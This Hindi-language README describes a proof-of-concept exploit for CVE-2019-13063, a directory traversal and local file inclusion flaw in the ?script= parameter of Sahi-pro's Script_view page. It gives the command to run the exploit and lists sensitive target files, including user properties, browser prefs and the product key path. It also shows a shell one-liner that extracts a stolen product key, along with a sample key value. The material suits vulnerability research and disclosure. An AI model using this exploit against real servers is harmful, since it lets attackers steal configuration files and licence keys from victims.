
प्रूफ ऑफ कॉन्सेप्ट उपकरण जो Sahi-pro वेब एप्लिकेशन CVE-2019-13063 में मौजूद निर्देशिका ट्रैवर्सल और स्थानीय फ़ाइल समावेशन कमज़ोरी का शोषण करता है।
Sahi-pro स्क्रिप्ट मैनेजर वेब-एप्लिकेशन में एक समस्या पाई गई है, जिसमें फ़ाइल और निर्देशिका ट्रैवर्सल दोनों कमजोरियाँ हैं, जो Sahi-pro वेब-एप्लिकेशन के /Script_view पेज पर स्थित ?script= पैरामीटर में मौजूद हैं। एक हमलावर एक विशेष रूप से तैयार URL भेजकर पीड़ित से संवेदनशील फ़ाइलों को पुनः प्राप्त और चुरा सकता है।
यह Sahi-pro वेब-एप्लिकेशन में स्थित निर्देशिका ट्रैवर्सल और फ़ाइल ट्रैवर्सल कमजोरी का शोषण करने के लिए एक प्रूफ ऑफ कॉन्सेप्ट टूल है।
प्रभाव: Sahi-pro वेब-एप्लिकेशन सॉफ्टवेयर में एक निर्देशिका और फ़ाइल ट्रैवर्सल कमजोरी है, जिसके परिणामस्वरूप एप्लिकेशन से संवेदनशील जानकारी का रिसाव होता है, या इसका उपयोग सीधे सिस्टम फ़ाइलों को खींचने के लिए किया जा सकता है।
script_view पेज पर ?script= पैरामीटर फ़ाइलों की सामग्री को सूचीबद्ध करने के लिए फ़ाइल और निर्देशिका ट्रैवर्सल के लिए संवेदनशील है।
इसे इस प्रकार चलाएं:
$ python3 CVE-2019-13063-POC.py --url http://example:[REDACTED]
यह एप्लिकेशन का उत्पाद कुंजी डाउनलोड करेगा।
पूरा URL निर्दिष्ट करें, जिसमें वह फ़ाइल भी शामिल हो जिसे आप कमजोर ?script= पैरामीटर से जोड़कर डाउनलोड करना चाहते हैं।
usage: CVE-2019-13063-POC.py [-h] [--url URL]
optional arguments:
-h, --help show this help message and exit
--url URL Specify the vulnerable URL
Sahi User properties file - \sahi_pro\userdata\config\userdata.properties
Sahi data profile - \sahi_pro\userdata\browser\ff\profiles\sahi0\prefs.js
Sahi properties file - \sahi_pro\config\sahi.properties
Sahi Product key location - \config\productkey.txt
यह स्क्रिप्ट पूरे पेज को डाउनलोड करने का प्रयास करेगी, आप एक साधारण bash वन-लाइनर के साथ पेज से वांछित सामग्री को आसानी से पार्स कर सकते हैं क्योंकि यह अद्वितीय <ol><li> HTML पैरामीटर के बीच है।
उत्पाद कुंजी निकालने का उदाहरण:
cat output.txt | grep "<ol><li>" | cut -d ">" -f3 | cut -d "<" -f1
1a79a4d60de6718e8e5b326e338ae533